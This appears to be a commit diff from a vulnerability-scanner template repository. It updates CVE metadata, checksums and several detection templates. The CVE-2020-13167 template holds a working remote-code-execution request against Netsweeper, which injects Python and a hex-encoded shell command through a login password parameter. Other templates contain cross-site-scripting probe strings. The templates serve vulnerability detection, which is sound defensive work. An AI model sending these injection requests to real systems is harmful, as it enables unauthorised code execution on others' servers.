{"ID":"CVE-2023-34843","Info":{"Name":"Traggo Server - Local File Inclusion","Severity":"high","Description":"traggo/server version 0.3.0 is vulnerable to directory traversal.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34843.yaml"}
{"ID":"CVE-2023-34843","Info":{"Name":"Traggo Server - Local File Inclusion","Severity":"high","Description":"traggo/server version 0.3.0 is vulnerable to directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-34843.yaml"}
{"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"high","Description":"","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"}
{"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"}
{"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"}
{"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"}
{"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"}
{"ID":"CVE-2023-36287","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36287.yaml"}
{"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"}
{"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross-site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"}
{"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"}
{"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"}
{"ID":"CVE-2023-37270","Info":{"Name":"Piwigo 13.7.0 - SQL Injection","Severity":"high","Description":"Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that acquires the HTTP Header `User-Agent` is vulnerable at the endpoint that records user information when logging in to the administrator screen. It is possible to execute arbitrary SQL statements. Someone who wants to exploit the vulnerability must be log in to the administrator screen, even with low privileges. Any SQL statement can be executed. Doing so may leak information from the database. Version 13.8.0 contains a fix for this issue. As another mitigation, those who want to execute a SQL statement verbatim with user-enterable parameters should be sure to escape the parameter contents appropriately.\n","Classification":{"CVSSScore":"7.6"}},"file_path":"http/cves/2023/CVE-2023-37270.yaml"}

2
cves.json-checksum.txt
View File

@ -1 +1 @@
f6e507dbd958f9c637767d73dd2db357
9836d4f0017b799ea98d98b662eb214e

11
http/cves/2020/CVE-2020-13167.yaml
View File

@ -19,15 +19,18 @@ info:
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
metadata:
max-request: 2
hex-payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
vendor: netsweeper
product: netsweeper
tags: cve,cve2020,netsweeper,rce,python,webadmin
variables:
randomstring: {{randstr}}
payload: echo "{{base64(randomstring)}}" | base64 -d > /usr/local/netsweeper/webadmin/out
http:
- method: GET
path:
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(payload))}}%27.decode%28%27hex%27%29%29%23&timeout=5"
- "{{BaseURL}}/webadmin/out"
headers:
@ -36,9 +39,9 @@ http:
matchers-condition: and
matchers:
- type: word
part: body
part: body_2
words:
- "nonexistent"
- "{{randomstring}}"
- type: status
status:

9
http/cves/2021/CVE-2021-21087.yaml
View File

@ -1,13 +1,15 @@
id: CVE-2021-21087
info:
name: Adobe ColdFusion - Remote Code Execution
name: Adobe ColdFusion - Cross-Site Scripting
author: Daviey
severity: medium
description: Adobe ColdFusion is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
description: |
Adobe Coldfusion versions 2016 (update 16 and earlier), 2018 (update 10 and earlier) and 2021.0.0.323925 are affected by an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. An attacker could abuse this vulnerability to execute arbitrary JavaScript code in context of the current user. Exploitation of this issue requires user interaction.
reference:
- https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
- https://twitter.com/Daviey/status/1374070630283415558
- https://nvd.nist.gov/vuln/detail/CVE-2021-21087
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
@ -20,7 +22,7 @@ info:
shodan-query: http.component:"Adobe ColdFusion"
vendor: adobe
product: coldfusion
tags: rce,adobe,misc,coldfusion
tags: cve,cve2021,xss,adobe,misc,coldfusion
http:
- method: GET
@ -34,7 +36,6 @@ http:
- "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex

2
http/cves/2023/CVE-2023-0448.yaml
View File

@ -27,7 +27,7 @@ http:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(all_headers, "text/html")'
- 'contains(header, "text/html")'
- 'contains(body, "><svg onload=alert(document.domain)>")'
- 'contains(body, "params\":{\"action")'
condition: and

2
http/cves/2023/CVE-2023-23491.yaml
View File

@ -27,7 +27,7 @@ http:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(all_headers, "text/html")'
- 'contains(header, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>")'
- 'contains(body, "qem_calendar")'
condition: and

2
http/cves/2023/CVE-2023-28665.yaml
View File

@ -35,7 +35,7 @@ http:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(all_headers_2, "text/html")'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "<svg onload=alert(document.domain)>")'
- 'contains(body_2, "pagination\":")'
condition: and

2
http/miscellaneous/spnego-detect.yaml
View File

@ -26,7 +26,7 @@ http:
matchers:
- type: dsl
dsl:
- "contains(tolower(all_headers), 'www-authenticate: negotiate')"
- "contains(tolower(header), 'www-authenticate: negotiate')"
extractors:
- type: kval

4
http/technologies/graylog/graylog-api-exposure.yaml
View File

@ -76,7 +76,7 @@ http:
- type: dsl
dsl:
- "status_code == 200"
- "contains_any(all_headers, 'X-Graylog-Node-Id', 'Graylog', 'graylog')"
- "contains_any(header, 'X-Graylog-Node-Id', 'Graylog', 'graylog')"
- "contains_any(body, 'X-Graylog-Node-Id', 'Graylog', 'graylog')"
- "contains_any(body, 'swagger')"
condition: and
@ -85,5 +85,5 @@ http:
name: unauthorized-graylog-header
dsl:
- "status_code == 401"
- "contains(all_headers, 'X-Graylog-Node-Id') || contains(all_headers, 'Graylog Server')"
- "contains(header, 'X-Graylog-Node-Id') || contains(header, 'Graylog Server')"
condition: and

48
templates-checksum.txt
View File

@ -8,8 +8,8 @@ TEMPLATES-STATS.json:3a27ac2e08b32beb9b45732d7d8a7956acebc269
TEMPLATES-STATS.md:b54d2dea62fc8f8ecb45ad5a64267b6dfcc0cef8
TOP-10.md:80c926bc5332f874af54b500339d2297d11d2e65
contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
cves.json:59d5c5ba74ca0494cff6ad3755bf22f881df9a38
cves.json-checksum.txt:87b8a6f39fb77ae21b1a6792d71a68c987fa9834
cves.json:e4b98b2b6d64492558f2fbc55bfd034972a1e0e6
cves.json-checksum.txt:b1ceb2263b07c6510267b2372d74e37e0b3fb80e
dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c
dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161
dns/cname-fingerprint.yaml:f7200ff1f3b3f96a7a92ddd6b49e5e5abe1d2377
@ -1265,7 +1265,7 @@ http/cves/2020/CVE-2020-12800.yaml:d35a2c2a8ba9835c1dd87e1b0b31f1168cd078e4
http/cves/2020/CVE-2020-13117.yaml:d574cedc851d3980c625005181d86a0e469366de
http/cves/2020/CVE-2020-13121.yaml:9dc7b16d238c0f459e1c859af2eee995a490a654
http/cves/2020/CVE-2020-13158.yaml:f62235f5a3b204038b3da15490ab9114643183b8
http/cves/2020/CVE-2020-13167.yaml:697cc9b02f5f30f1791091e7cf13926fa879ea1c
http/cves/2020/CVE-2020-13167.yaml:2c081c9c335b1d332370705e90ed738b017c5067
http/cves/2020/CVE-2020-13258.yaml:aa3db4375fb4584fac99169f08ac1cda299855f3
http/cves/2020/CVE-2020-13379.yaml:4c62c2dda3258e27300b0607a29312d19622297d
http/cves/2020/CVE-2020-13405.yaml:364c8a655d463164f79a3da5c045565d4fa9ff57
@ -1492,7 +1492,7 @@ http/cves/2021/CVE-2021-20167.yaml:78ec7bf5f6399292f9bb1f98fe19810408148342
http/cves/2021/CVE-2021-20323.yaml:e5721e9becd213d3dfaf4162b8b60c1a07bc371e
http/cves/2021/CVE-2021-20792.yaml:dd9ec44c0c4f39baeec41be8aedb9ad1c4987b33
http/cves/2021/CVE-2021-20837.yaml:ec1b8ef5c7af2188bbe81e5cf737d1d72077dc32
http/cves/2021/CVE-2021-21087.yaml:345d1409b5ea8610f4a71d58da3f528251bbaf17
http/cves/2021/CVE-2021-21087.yaml:6bf351bbdc7a379fe07c243608a940c5ae646e45
http/cves/2021/CVE-2021-21234.yaml:75441424981ca8d6490fcd19afa7273f4279fc2f
http/cves/2021/CVE-2021-21287.yaml:a022b4debe13408242e0bb0cff0105c9b787a298
http/cves/2021/CVE-2021-21307.yaml:1cf6128664e16ddd4a7ecb9bff536873331c426b
@ -2308,7 +2308,7 @@ http/cves/2023/CVE-2023-0126.yaml:c1e6addee5c9dd3b7597e31b0cbdae1e8394574e
http/cves/2023/CVE-2023-0236.yaml:4902cd4428b7b55e235c0f117a7e844cc9e7a086
http/cves/2023/CVE-2023-0261.yaml:7c2bc4a431177a8e9262f898fbc8e399ee4c3954
http/cves/2023/CVE-2023-0297.yaml:c7f4dcb405fb45d33b74d4d6c6bdbb27e7751754
http/cves/2023/CVE-2023-0448.yaml:32b9004716071031f9702e25f0a8c7b57d041265
http/cves/2023/CVE-2023-0448.yaml:b3e2333aea44c85f270b3dd06097b2b07e910687
http/cves/2023/CVE-2023-0514.yaml:ca8effda31dd5e9b0f5120b6a3d223d64d5f699b
http/cves/2023/CVE-2023-0527.yaml:9bf8c728461c5bf384aa67fc38b524f335156334
http/cves/2023/CVE-2023-0552.yaml:e4403119c1622167826d81f9b3827b8432537863
@ -2345,7 +2345,7 @@ http/cves/2023/CVE-2023-22897.yaml:8acc1b0b87523947cea05ffba389ce1f8bc64055
http/cves/2023/CVE-2023-23333.yaml:2d5c516870ee33adb44c4c1132fb240e4f5ed3c2
http/cves/2023/CVE-2023-23488.yaml:8610d721fa033bb8e0add0278ce79b275d7bdc81
http/cves/2023/CVE-2023-23489.yaml:80e85c81ae6a8795e9b3b61195691111617a2ad8
http/cves/2023/CVE-2023-23491.yaml:176c2377df09955c553d93a200c3ec9d0e908104
http/cves/2023/CVE-2023-23491.yaml:3fd2689d2d80e809ac8b322183ea54873fb7a7d5
http/cves/2023/CVE-2023-23492.yaml:fe921e93fa9237234d1d374d099c58f3d4853e5b
http/cves/2023/CVE-2023-2356.yaml:2c091a01832d76f5c2f35a90734e8362d1c8d1ff
http/cves/2023/CVE-2023-23752.yaml:8239c973fa77c02136a9f6aba3ccf49ea37ca229
@ -2386,7 +2386,7 @@ http/cves/2023/CVE-2023-2822.yaml:d0406a5b37894c66cbbe28b10573bf81cd85a97d
http/cves/2023/CVE-2023-2825.yaml:c8162f77e64bc6db2406c171cf469f0a8e83322d
http/cves/2023/CVE-2023-28343.yaml:d7f2c2b672787f62498a7e9708397a012edf14a5
http/cves/2023/CVE-2023-28432.yaml:1464bb6e1dd94891653ddf701dbd8e300e5d0e8d
http/cves/2023/CVE-2023-28665.yaml:8242daa68ad2b2c9d47ef006bba31b0b044383c5
http/cves/2023/CVE-2023-28665.yaml:724e83a8833df2b1ca691f4e9641465590158a99
http/cves/2023/CVE-2023-29084.yaml:350271d63ebf14271c60ad78979695c63f3a8249
http/cves/2023/CVE-2023-29298.yaml:2c1bb9ec25820e16146e430af561a90490a8a30c
http/cves/2023/CVE-2023-29300.yaml:f99db39cae5b98912a5c666e399c8b4d889e4414
@ -4017,7 +4017,7 @@ http/miscellaneous/robots-txt-endpoint.yaml:77a2aecea8dd753215ede1443d94a1114463
http/miscellaneous/robots-txt.yaml:43b0f22528ebff24084bee1b8542d3eaa45ee3e8
http/miscellaneous/security-txt.yaml:01860642627f2d383a9326d0ee0f939a14595ee0
http/miscellaneous/sitemap-detect.yaml:896df94a32924657fe3dafc7dbe4ac63e7c7f7bb
http/miscellaneous/spnego.yaml:f88e797754bce546e10f6a36067c3131c0a38a7b
http/miscellaneous/spnego.yaml:ebeb00e66b45839e7196f93dda25588ff544e0ca
http/miscellaneous/x-recruiting-header.yaml:80823f643deba3532ed2ef4f1c735239cc6ede13
http/miscellaneous/xml-schema-detect.yaml:b872ff3f34ecb006eda8c630f1bfb9d313f54ace
http/misconfiguration/ace-admin-dashboard.yaml:87ebaee82ef99a8f8104c417991aa3224f14d97c
@ -5319,7 +5319,7 @@ http/technologies/google-frontend-httpserver.yaml:c416cb0e9df0144e8ebc2439d4b1e4
http/technologies/graphiql-detect.yaml:669bc20536688af5e096bae8d47c674908326e33
http/technologies/graphql-detect.yaml:4883700c1e84109b432047d73dc7074596d82c19
http/technologies/grav-cms-detect.yaml:baa013658aec1b33f00245348aa8a4b877b706c7
http/technologies/graylog/graylog-endpoints-exposure.yaml:f92e7d4753057e31546170ed60c355108930ed2e
http/technologies/graylog/graylog-endpoints-exposure.yaml:d87c73feee28ec1908d141f9c1f394162c490814
http/technologies/graylog-api-browser.yaml:d8d5647a5dac28050c8de5397772ec72c723dd19
http/technologies/gunicorn-detect.yaml:e1e6bf8d9a49aa900fadf586f44e600c53cbc0b3
http/technologies/hanwang-detect.yaml:f1d1efe5bc344d4488ad08b29661242288a59a5a
@ -6659,20 +6659,20 @@ network/exposures/exposed-adb.yaml:7ced6061a398707eafdd4a2a3e7281f6105f0598
network/exposures/exposed-dockerd.yaml:38d028778904ad743e17ef4928bc535cb7dcc8b3
network/exposures/exposed-redis.yaml:eac55d6dc5da21cf64f485bb13a1307d853df3be
network/exposures/exposed-zookeeper.yaml:907b6e2517bcad3ebd432f4b747d9673fbc16c45
network/jarm/c2/cobalt-strike-c2-jarm.yaml:245a0358982161e937434d4b44128522129340f7
network/jarm/c2/covenant-c2-jarm.yaml:56fa35976583cbd752c45517df1d8297a2b08ae2
network/jarm/c2/deimos-c2-jarm.yaml:2cf236ec9923dc7cffdd27648ec5473b5869ef0f
network/jarm/c2/evilginx2-jarm.yaml:ac842609041707a08d00bdd8fb059bee613cced0
network/jarm/c2/grat2-c2-jarm.yaml:341f42c898d88e7185d47aaaeeb5ba2ea7bab92f
network/jarm/c2/mac-c2-jarm.yaml:50ca76ed43d7ef7fc1612dee08a85e94f1ad7222
network/jarm/c2/macshell-c2-jarm.yaml:dafecf965a881ac27a6af2c04f8acbc6edeee8e4
network/jarm/c2/merlin-c2-jarm.yaml:72a4acc2f75a67dcca4698d89632849d0dc0c9c0
network/jarm/c2/metasploit-c2-jarm.yaml:40e8f0208177a92a3af4049e3560ac9c3c55a00c
network/jarm/c2/mythic-c2-jarm.yaml:550f0f6bd81697bb04fc84a82752816e11d0e4b8
network/jarm/c2/posh-c2-jarm.yaml:8afb110692c2dd41b3016c73d083dd1357957c29
network/jarm/c2/shad0w-c2-jarm.yaml:94bcb01464f3b6023a9bfd27add5253904141f0b
network/jarm/c2/silenttrinity-c2-jarm.yaml:bd4850a3850f7c644b081cffba6e23fd5172fea2
network/jarm/c2/sliver-c2-jarm.yaml:f04ca27aceb04ff2c4ebed9e825fd70863ae866f
network/jarm/c2/cobalt-strike-c2-jarm.yaml:7bf85725d77f35262ff24b7678adc4461404b92e
network/jarm/c2/covenant-c2-jarm.yaml:71fe7c9b7f6f7fbef263204bf701a6a5a513eb1f
network/jarm/c2/deimos-c2-jarm.yaml:bcbf9501f84caefd8c9385a3575a3fb6c2fd4ce2
network/jarm/c2/evilginx2-jarm.yaml:04e8a311b4667c717d98e078b303ddf0acc8c45b
network/jarm/c2/grat2-c2-jarm.yaml:c65ba635668f2d9e070ee7f965bed80271bd74f5
network/jarm/c2/mac-c2-jarm.yaml:69f4e60da5ceebb503abb2c5a2808b64a4efb531
network/jarm/c2/macshell-c2-jarm.yaml:9f6b4f99117ded73d854023e8c6c448900469d5f
network/jarm/c2/merlin-c2-jarm.yaml:d72eaa1dfb398a4e4417e102168167830c370511
network/jarm/c2/metasploit-c2-jarm.yaml:a2f6f03a179a4d3e3ff49cc7387a8e10dbbd71ef
network/jarm/c2/mythic-c2-jarm.yaml:6f8db2d997b3e171d8c0ae2a7e21021914cc8584
network/jarm/c2/posh-c2-jarm.yaml:06aa7bbb8f3cd637fde301b7eac9c83b68467f0c
network/jarm/c2/shad0w-c2-jarm.yaml:21d654db72d9fbefa32a7ec40d4a77616aa4a43a
network/jarm/c2/silenttrinity-c2-jarm.yaml:fdec712cc69eed900b0d7ba42187a0ea0e7bb95b
network/jarm/c2/sliver-c2-jarm.yaml:dd41a2f23026cb1ce6fab8fb12f3e4a82a2accc3
network/misconfig/apache-dubbo-unauth.yaml:09668afcc0c2b0182f0bf739cb077295a979c353
network/misconfig/apache-rocketmq-broker-unauth.yaml:edd648524e951c5124b59c1436d7ba621e2d4437
network/misconfig/clamav-unauth.yaml:795eda3df907879e4b11d230ffe0fffaa6fe022f
@ -6713,7 +6713,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec
templates-checksum.txt:c2e9ff9fd708db1cbdb37e148f4f78d98b11b56f
templates-checksum.txt:0e503f4a98b1707259dda6acceed43fd3bb17e15
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f